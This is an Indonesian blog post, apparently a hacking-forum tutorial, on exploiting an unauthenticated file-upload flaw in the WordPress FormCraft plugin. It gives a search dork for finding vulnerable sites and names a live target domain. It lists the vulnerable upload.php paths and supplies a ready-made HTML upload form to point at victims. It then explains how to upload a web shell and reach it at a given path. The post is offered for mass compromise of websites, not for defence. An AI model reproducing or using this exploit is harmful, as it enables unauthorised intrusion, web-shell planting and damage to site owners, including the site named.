Copy Paste Blog

Wordpress Plugins FormCraft Upload Vuln

Wordpress Plugins FormCraft Upload Vuln

Copy Paste Dork : inurl:"wp-content//plugins/formcraft/"
Live Target : http://quiropracticoqro.com/

Exploit : 

Code:
1. wp-content/plugins/formcraft/file-upload/server/php/upload.php
2. wp-content/plugins/formcraft/file-upload/server/php/


Script CSRF :

Code:
<form method="POST" action="http://www.Unknown~X.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

*Save As .html


Cari target menggunakan dork di atas  :troll: 
Lalu masukkan exploit yang di atas  :lol: 
Jika Vuln akan nampak seperti ini  :ngakak: 
Vuln :[/color
[Image: image.png]

Sekarang tinggal edit targetnya di Script CSRF yang tadi ..
Sekarang buka filenya dengan browser yang mastah gunakan  :sungkem:
Lalu upload deh shell kesangannya  :joget1:

Setelah upload maka akan nampak seperti ini
[Image: Screenshot_1.png]

Shell Access : http://www.Unknown~X.com/wp-content/plugins/formcraft/file-upload/server/php/files/namashell.php

Jika Berhasil Akan Muncul Shell Kesayangan Sobat :cool::
Tapi Jika Ga Muncul Berarti Sobat Kurang Ganteng Kata Mr. DellatioNx196 :vv

Sekian, Semoga bermanfaat  :nyengir:
Wassalamualaikum  :sibuk: